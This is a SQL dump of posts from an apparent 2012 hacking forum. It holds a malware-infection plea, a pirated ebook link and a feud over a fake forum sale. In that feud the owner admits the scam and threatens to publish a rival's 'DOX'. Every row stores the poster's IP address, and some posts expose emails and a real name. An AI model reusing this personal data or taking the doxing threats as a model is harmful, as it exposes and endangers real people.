`dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3789', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '222', 'Exposé', '1349637234', 'I can do a couple of mockups if u would like. ;)', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', 'a3a594b846618cca1cf9f51a9310d8f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3790', '741', '3766', '9', 'RE: 7 Videos That Will Show You How To Make Real Income Online!', '0', '53', 'sirchamp', '1349637350', 'Lol. I just saw this on elitevip.net Thanks for posting this here.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'ebacfc3582d7b084bc5d4e73d0c83c94', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3792', '743', '0', '23', 'I got a virus', '0', '82', 'iTzIpod', '1349641472', 'I\'m scared right now.. I got a virus on my laptop. I don\'t know what type it is. I just downloaded a Skype IP Resolver off of LeakForums. And forgot to run it in Sandboxie. And it didn\'t work. (It didn\'t open) After, I just tried to delete it and it didn\'t work. So I opened up my Task Manager and ended the process. And talked to my friend from school on Skype. And then it was randomly typing \"Fuck You Bitch\" and sending it to her. And I got scared so I just went and Shut Down my laptop. (I went to Start > Shut Down. And then when I turned it back on 5 minutes later, I opened up Notepad and deleted the Skype IP Resolver Program. And then I was randomly typing \"Hey\" And then it started typing \"NI GERS NIGGER NIGGER NIGGER NIGGERNIGEER NIGGER\" Etc.. I was so scared so I shut down my laptop again. What do I do? I don\'t know what this virus is.. Please help. My dad will get really pissed if he finds out and all. + My brother.. :/ Right now, I\'m running Sandboxie on my Web browser Google Chrome. And I downloaded the Skype IP Resolver from here http://www.leakforums.org/showthread.php?tid=24540 Don\'t download that and use it. Please help me though. I\'m in need of assistance. I forgot to run it in Sandboxie and now I\'m fucked. I don\'t know what this virus is called and what it is and does. All I know is that I am infected and also a victim. It was typing and sending random shit. And I\'m scared as fuck. Please help Thanks - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25af7f741d48583a68b2851325c1639b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3793', '744', '0', '19', '[Junk]Site Purchased', '0', '243', 'Anarchy $ucks', '1349642114', 'A while back, I had made an offer to purchase the site from t3h jok3r, and today they decided they\'d like to take me up on the offer. I have purchased L33thacking. I am assuming they have decided to sell the forum because of the recent server issues. In collaboration with t3h jok3r, we will be merging the site to [url=http://www.anarchyforums.net]Anarchy Forums[/url]. We will be merging all of the posts and users soon, so please be patient. What you will get to keep: [list] [*]Your posts, threads, and anything else you posted here. [*]Your username, signature, etc... (provided someone doesn\'t have your name on our site) [*]Your reputation. [/list] What you won\'t get to keep: [list] [*]Special usergroups (moderator, etc...) [Note that if you meet requirements, you may apply for usergroups on our site] [*]Posts that violate our rules, which, in most cases they won\'t. [*]A few other small things. [/list] For the most part, I would like to respect the members that have contributed here, and do my absolute best to accommodate for any losses you may have. Please notify me if I can improve your experience in the coming days. Additionally, I would like to thank t3h jok3r for giving us this opportunity. I know there might be some mixed opinions on this move, so I will do my best to personally address any concerns you may have.', '108.171.103.155', '1823172507', '0', '0', '0', '0', '1', '48486da6eeabe58c87da3cb57af7be36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3794', '744', '3793', '19', 'RE: Site Purchased', '0', '243', 'Anarchy $ucks', '1349642340', 'Kay, hopefully this will be good as the original!', '97.255.20.208', '1644106960', '0', '0', '0', '0', '1', 'fd0a4ab95d8b8b7619acf40510a5a9e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3795', '744', '3793', '19', 'RE: Site Purchased', '0', '231', 'Rhythm', '1349643453', 'The 1 Post Squad. Good luck Anarchist! ^-^', '99.233.52.247', '1676227831', '0', '0', '0', '0', '1', 'cf1f24eb255b347c7c298376eae33443', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3796', '654', '3226', '9', 'RE: Make money typing captchas', '0', '100', '??zg???g????61', '1349643974', 'iPod there\'s a character minimum of 25, So i did three D\'s lol.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '97e0274533758e48c23c82e4eb0b711b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3797', '743', '3792', '23', 'RE: I got a virus', '0', '100', '??zg???g????61', '1349644190', 'Well from what your describing, it seems like you caught someones RAT. I\'d PM anonymous, his signature advertises \"RAT Removal Specialist\"', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '694048851bdcae926f029b9dd3aa6239', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3798', '745', '0', '59', '[Leak] Huge Folder of Ebooks', '0', '100', '??zg???g????61', '1349645213', 'Here are a ton of paid and free Ebooks. I haven\'t tried them out yet, I will soon. http://www.mediafire.com/?1jl1va1qe3ei90x Screenshot http://gyazo.com/21f273d37e824f179be3fef902fd3394 Enjoy! ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '6026be0add4f867672e0b1a9ada8099a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3799', '744', '3793', '19', 'RE: Site Purchased', '0', '222', 'Exposé', '1349645262', 'Lol well i\'m gone. This was a very bad decision. This site has so much more activity than anarchy forums and l33thacking will be just a memory. Cya guys', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', '7cf0530bac816de5999e80889baaa1ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3800', '744', '3793', '19', 'RE: Site Purchased', '0', '1', 't3h jok3r', '1349645375', 'WTF? L33THacking is not for sell and never would be. L33THacking was not sold.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd9b3f4c9fa07f183cfdcf0264481d657', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3801', '746', '0', '19', '[Junk]L33thacking wtf.....', '0', '222', 'Exposé', '1349645531', 'Why did you agree to sell the site to the anarchist. This is a horrible decision. And here is why... 1) The name doesn\'t even have a definite meaning 2) None of the members are actually active 3) L33thacking has higher quality content I hope the decision wasn\'t based on just cause you guys wanted money. If it was server issues you could have purchased better hosting... Can someone please help me understand this stupid decision...', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', '701cc03bae2b1c032c5dd267e83f9963', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3802', '744', '3793', '19', 'RE: Site Purchased', '0', '222', 'Exposé', '1349645579', 'Wtf is going on???????????', '66.87.87.186', '1113020346', '1', '0', '0', '0', '1', 'd9df2183a60ba52485a57b9c1a750228', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3803', '744', '3802', '19', 'RE: Site Purchased', '0', '243', 'Anarchy $ucks', '1349645694', '[quote=\'t3h jok3r\'] [quote=\'The Anarchist\'] [quote=\'t3h jok3r\'] [quote=\'The Anarchist\'] [quote=\'t3h jok3r\'] I\'m done with LH, I want to sell it. Do you have Skype or MSN? [/quote] I do. Email: Unverified@hotmail.com [/quote] Do you have Skype? [/quote] TheAnarchistAF I am not sure if my PMs are going through [/quote] Nah then lets chat on MSN. I added you from erica8989@hotmail.com [/quote] The rest was discussed on MSN. If the owner is reneging on their deal, I\'m afraid that\'s their issue.', '108.171.103.155', '1823172507', '0', '0', '243', '1349645832', '1', '923d6d0a6453b2ad06916cccea4b2653', '0', '1349645832'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3804', '744', '3793', '19', 'RE: Site Purchased', '0', '100', '??zg???g????61', '1349647510', 'Anarchist don\'t even try. This is all a lie everyone. I talked to t3h jok3r on skype.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd0596de19159a99438ecbb9b03f88a65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3805', '744', '3804', '19', 'RE: Site Purchased', '0', '243', 'Anarchy $ucks', '1349648269', '[quote=\'iTzGRONgamer61\' pid=\'3804\' dateline=\'1349647510\'] Anarchist don\'t even try. This is all a lie everyone. I talked to t3h jok3r on skype. [/quote] I\'m afraid it\'s not. If t3h jok3r can\'t keep their own deals, I\'m afraid that\'s their issue. The merger will be delayed on this. However, I can\'t see the site lasting too long given the downtime today. Here are the private messages exchanged between us. [img]http://gyazo.com/6f54520f4c3337088d33fa7e2ed92e60.png?1349646781[/img] And the messages from MSN: [spoiler][img]http://gyazo.com/bc109428cd60d030ef90b2bff589565e.png[/img] [img]http://gyazo.com/a1aa9e073e26a05f17d37abfc714cb65.png[/img] [img]http://gyazo.com/224b052abb165b92493cc64cbe541b7f.png?1349647000[/img] [img]http://gyazo.com/025589a8c9520f9151736399c605d0df.png?1349647050[/img][/spoiler]', '108.171.103.155', '1823172507', '0', '0', '243', '1349648493', '1', '5e774c53717ff5182f8e575cf012ed33', '0', '1349648493'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3806', '746', '3801', '19', 'RE: L33thacking wtf.....', '0', '1', 't3h jok3r', '1349649119', 'We never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '396b2d015c796f665abc1b141f17dbcf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3807', '744', '3793', '19', '[Junk]Site Purchased', '0', '1', 't3h jok3r', '1349649205', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3808', '746', '3806', '19', 'RE: L33thacking wtf.....', '0', '243', 'Anarchy $ucks', '1349649265', 'It appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction. [quote=\'t3h jok3r\' pid=\'3806\' dateline=\'1349649119\'] We never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members. [/quote] I\'m afraid we have nothing to do with your server issues.', '108.171.103.155', '1823172507', '0', '0', '0', '0', '1', '5260ac763a7cdb79b738c3d6b3d68e11', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3809', '747', '0', '3', 'L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349649678', 'The truth is that Anarchy forums have been DDoSing l33thacking today and advertising secretly so Anarchy forums owner once offered me to sell my website so what I did was went on with the deal and took the money he gave me and took his contact information and created a DOX. I had someone on Anarchy forums to create a DOX of their members and some of Anarchy forum Staff have been sold out to me. They have been paid to leave AF and join my forum and provide me with their members IP addresses. L33THacking was never sold and will never be sold. This is my forum and the best forum. No stink ass low class forum owner such as The Anarchist will steal may forum. [b]OPEN ANNOUNCEMENT[/b] Bitch you stole my bro from LH, you DDoSed my website and got me banned by Google now since I have your DOX watch what happens. Tor browser has a lot of benefits too. I never joined your site neither I have Skype so you don\'t have any information on me. THE PAYPAL YOU SENT MONEY TO IS MY GFS PP AND I HAVE MOVED THE MONEY ANYWAY. FUCK YOU AND ENJOY YOUR DOWNTIME BITCH! [b]IF ANY OF YOUR MEMBERS TRY TO HARM MY WEBSITE, I WILL SEND A REPORT TO YOUR ISP AND TELL THEM THAT YOU ARE INVOLVED IN HACKING ACTIVITES.[/b]', '72.231.24.165', '1223104677', '1', '0', '1', '1349649770', '1', '2da22359195ba02e01b49aa3bc60836c', '0', '1349649770'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3810', '746', '3808', '19', 'RE: L33thacking wtf.....', '0', '1', 't3h jok3r', '1349649859', '[quote=\'The Anarchist\' pid=\'3808\' dateline=\'1349649265\'] It appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction. [quote=\'t3h jok3r\' pid=\'3806\' dateline=\'1349649119\'] We never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members. [/quote] I\'m afraid we have nothing to do with your server issues. [/quote] I have your sites member admit that your guys members have been DDoSing LH. Check your sites PM.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '35ac2bd017487ce809363998c4385abe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3811', '746', '3810', '19', 'RE: L33thacking wtf.....', '0', '243', 'Anarchy $ucks', '1349650573', '[quote=\'t3h jok3r\' pid=\'3810\' dateline=\'1349649859\'] [quote=\'The Anarchist\' pid=\'3808\' dateline=\'1349649265\'] It appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction. [quote=\'t3h jok3r\' pid=\'3806\' dateline=\'1349649119\'] We never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members. [/quote] I\'m afraid we have nothing to do with your server issues. [/quote] I have your sites member admit that your guys members have been DDoSing LH. Check your sites PM. [/quote] Although I have absolutely no control over our users, I can assure you I had nothing to do with that, if that\'s the case. There doesn\'t seem to be any proof that supports your claims, and I have received no messages. It\'s possible, but I don\'t see any proof, or claims from our users.', '108.171.103.155', '1823172507', '0', '0', '243', '1349650592', '1', '7ef03bf9943f363958674b99032d2449', '0', '1349650592'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3812', '746', '3811', '19', 'RE: L33thacking wtf.....', '0', '1', 't3h jok3r', '1349650847', '[quote=\'The Anarchist\' pid=\'3811\' dateline=\'1349650573\'] [quote=\'t3h jok3r\' pid=\'3810\' dateline=\'1349649859\'] [quote=\'The Anarchist\' pid=\'3808\' dateline=\'1349649265\'] It appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction. [quote=\'t3h jok3r\' pid=\'3806\' dateline=\'1349649119\'] We never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members. [/quote] I\'m afraid we have nothing to do with your server issues. [/quote] I have your sites member admit that your guys members have been DDoSing LH. Check your sites PM. [/quote] Although I have absolutely no control over our users, I can assure you I had nothing to do with that, if that\'s the case. There doesn\'t seem to be any proof that supports your claims, and I have received no messages. It\'s possible, but I don\'t see any proof, or claims from our users. [/quote] OK lets just say for a minute that you had anything to do with it but how did your members find out about my website and advertise?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c5137c3234a04bbf82a0a705714aa9eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3813', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349650881', 'I\'m afraid we have absolutely nothing to do with your downtime. Fortunately for me, the money sent wasn\'t from my Paypal account. Now you know why I didn\'t wish to send it from my own account. However, if you do happen to find my personal information, I openly invite you to post it. I have nothing to hide, and any actions you are to take with it would be on you. It has been proven that you scammed me, and I will file a chargeback as I am allowed to. I recommend you act more professional and disable your capslock, as it is a poor representation of your site.', '108.171.103.155', '1823172507', '0', '0', '243', '1349650889', '1', 'ab4457117e84b2249228199fc30009e3', '0', '1349650889'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3814', '746', '3812', '19', 'RE: L33thacking wtf.....', '0', '243', 'Anarchy $ucks', '1349651064', '[quote=\'t3h jok3r\' pid=\'3812\' dateline=\'1349650847\'] [quote=\'The Anarchist\' pid=\'3811\' dateline=\'1349650573\'] [quote=\'t3h jok3r\' pid=\'3810\' dateline=\'1349649859\'] [quote=\'The Anarchist\' pid=\'3808\' dateline=\'1349649265\'] It appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction. [quote=\'t3h jok3r\' pid=\'3806\' dateline=\'1349649119\'] We never did. The guy is lying, he has been secretly advertising and DDoSing LH for a long time and now he lied so he could steal some members. [/quote] I\'m afraid we have nothing to do with your server issues. [/quote] I have your sites member admit that your guys members have been DDoSing LH. Check your sites PM. [/quote] Although I have absolutely no control over our users, I can assure you I had nothing to do with that, if that\'s the case. There doesn\'t seem to be any proof that supports your claims, and I have received no messages. It\'s possible, but I don\'t see any proof, or claims from our users. [/quote] OK lets just say for a minute that you had anything to do with it but how did your members find out about my website and advertise? [/quote] Ironically enough, a member of your site spammed on ours. It would only make sense. I did express negative feelings towards such methods of advertising, so it could very well be that they took that as a reason to advertise back. I have better things to do than bother with your site, no offense. Your site has been down all day, and I can\'t say I would waste my time.', '108.171.103.155', '1823172507', '0', '0', '243', '1349651077', '1', 'e3690a0b77e0bdf2f412daf47659a858', '0', '1349651077'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3815', '747', '3813', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349651201', '[quote=\'The Anarchist\' pid=\'3813\' dateline=\'1349650881\'] I\'m afraid we have absolutely nothing to do with your downtime. Fortunately for me, the money sent wasn\'t from my Paypal account. Now you know why I didn\'t wish to send it from my own account. However, if you do happen to find my personal information, I openly invite you to post it. I have nothing to hide, and any actions you are to take with it would be on you. It has been proven that you scammed me, and I will file a chargeback as I am allowed to. I recommend you act more professional and disable your capslock, as it is a poor representation of your site. [/quote] Exactly my site so I get to do what I want to do. I scammed because you messed with me. I won\'t do anything with you info. I will post it online then whatever happens even if I do it, I am not hold responsible because anyone can do anything with your information. All I can say is GTFO and don\'t even think of coming back to LH. Also Leakforums and darthforums owners are my friends so if you think you will fuck up my website and get away then you are wrong.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1c36f2763a9883dc2f75023e6ea19e59', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3816', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '232', 'BreShiE', '1349651284', 'Haha, this is going to be fun! Yeah man, screw anarchists\' forum, the owner\'s an idiot and doesn\'t know how to run a forum. I\'m coming over here, screw him. They\'re just full of whining idiotic trolling kids, so screw them, I\'d prefer to be here. I\'m going to get some more information on them for you. Let\'s fuck them up!', '78.149.68.187', '1318405307', '0', '0', '232', '1349651353', '1', 'ffa9fbfc0aa768e55c75baf2dc22921f', '0', '1349651353'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3817', '747', '3815', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349651407', '[quote=\'t3h jok3r\' pid=\'3815\' dateline=\'1349651201\'] [quote=\'The Anarchist\' pid=\'3813\' dateline=\'1349650881\'] I\'m afraid we have absolutely nothing to do with your downtime. Fortunately for me, the money sent wasn\'t from my Paypal account. Now you know why I didn\'t wish to send it from my own account. However, if you do happen to find my personal information, I openly invite you to post it. I have nothing to hide, and any actions you are to take with it would be on you. It has been proven that you scammed me, and I will file a chargeback as I am allowed to. I recommend you act more professional and disable your capslock, as it is a poor representation of your site. [/quote] Exactly my site so I get to do what I want to do. I scammed because you messed with me. I won\'t do anything with you info. I will post it online then whatever happens even if I do it, I am not hold responsible because anyone can do anything with your information. All I can say is GTFO and don\'t even think of coming back to LH. Also Leakforums and darthforums owners are my friends so if you think you will fuck up my website and get away then you are wrong. [/quote] You should act more professionally if you have such powerful associates, they would likely frown upon the immaturity you have shown. As I\'ve said, you have a member\'s Paypal information, not mine. I will be pleasantly surprised if you manage to find me using his information. A site owner who scams as a means of making money is pathetic. I hope you look back later and choose not to do this in the future.', '108.171.103.155', '1823172507', '0', '0', '243', '1349651554', '1', 'cd2b73e2fa31e946b032c5375e95de10', '0', '1349651554'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3818', '747', '3817', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349651570', '[quote=\'The Anarchist\' pid=\'3817\' dateline=\'1349651407\'] [quote=\'t3h jok3r\' pid=\'3815\' dateline=\'1349651201\'] [quote=\'The Anarchist\' pid=\'3813\' dateline=\'1349650881\'] I\'m afraid we have absolutely nothing to do with your downtime. Fortunately for me, the money sent wasn\'t from my Paypal account. Now you know why I didn\'t wish to send it from my own account. However, if you do happen to find my personal information, I openly invite you to post it. I have nothing to hide, and any actions you are to take with it would be on you. It has been proven that you scammed me, and I will file a chargeback as I am allowed to. I recommend you act more professional and disable your capslock, as it is a poor representation of your site. [/quote] Exactly my site so I get to do what I want to do. I scammed because you messed with me. I won\'t do anything with you info. I will post it online then whatever happens even if I do it, I am not hold responsible because anyone can do anything with your information. All I can say is GTFO and don\'t even think of coming back to LH. Also Leakforums and darthforums owners are my friends so if you think you will fuck up my website and get away then you are wrong. [/quote] You should act more professionally if you have such powerful associates. As I\'ve said, you have a member\'s Paypal information, not mine. I will be pleasantly surprised if you manage to find me using his information. I hope you look back later and choose not to do this in the future. [/quote] LOL I\'m done with bedtime stories and one more thing I didn\'t not DOX the PP email.', '72.231.24.165', '1223104677', '1', '0', '1', '1349652056', '1', 'c5428d306db1268feab2dde58ad32fa8', '0', '1349652056'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3819', '746', '3814', '19', 'RE: L33thacking wtf.....', '0', '1', 't3h jok3r', '1349651774', '[quote=\'The Anarchist\' pid=\'3814\' dateline=\'1349651064\'] [quote=\'t3h jok3r\' pid=\'3812\' dateline=\'1349650847\'] [quote=\'The Anarchist\' pid=\'3811\' dateline=\'1349650573\'] [quote=\'t3h jok3r\' pid=\'3810\' dateline=\'1349649859\'] [quote=\'The Anarchist\' pid=\'3808\' dateline=\'1349649265\'] It appears t3h jok3r has no intentions of honoring their deals, so I don\'t see the deal happening any longer. Please view the other thread for proof of the transaction. I\'m afraid we have nothing to do with your server issues. [/quote] I have your sites member admit that your guys members have been DDoSing LH. Check your sites PM. [/quote] Although I have absolutely no control over our users, I can assure you I had nothing to do with that, if that\'s the case. There doesn\'t seem to be any proof that supports your claims, and I have received no messages. It\'s possible, but I don\'t see any proof, or claims from our users. [/quote] OK lets just say for a minute that you had anything to do with it but how did your members find out about my website and advertise? [/quote] Ironically enough, a member of your site spammed on ours. It would only make sense. I did express negative feelings towards such methods of advertising, so it could very well be that they took that as a reason to advertise back. I have better things to do than bother with your site, no offense. Your site has been down all day, and I can\'t say I would waste my time. [/quote] And thanks to your money I bought a VPS and as you said I have no control over my members. The more you post, the more my websites activity would increase', '72.231.24.165', '1223104677', '1', '0', '1', '1349651852', '1', '04dc60203732b44a00953844781e5bc1', '0', '1349651852'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3822', '749', '0', '4', 'It\'s BreShiE!', '0', '232', 'BreShiE', '1349652059', 'My name is Nathan Haines, I live in the UK and I\'m 18 years of age. I have been a web developer for around 2-3 years now, and have picked up many, many skills along the way. (coding etc...). My internet career began as I believe many do, I just used it to go and talk to friends / listen to music, but that all changed after I got expelled from school. I then got into Xbox LIVE, and became a \'no life\' for a while, I went through a stage where I couldn\'t talk about anything but my games, pretty sad, right? Then back in \'09 I learned about the \'back end\' of gaming, the gaming \'underworld\' which consists of DDoSing / hacking / cheating / scamming. I went through a bad spell and mixed with some bad people, as I have my whole life, things never change. Then mid \'10 I learned the art of webmastering. I began just running a simple Invision Power Board forum, which I again picked up many-many skills. Then early last year (2011) I began with MyBB Forums and actually buying my own domains. I haven\'t looked back since. After spending some time on 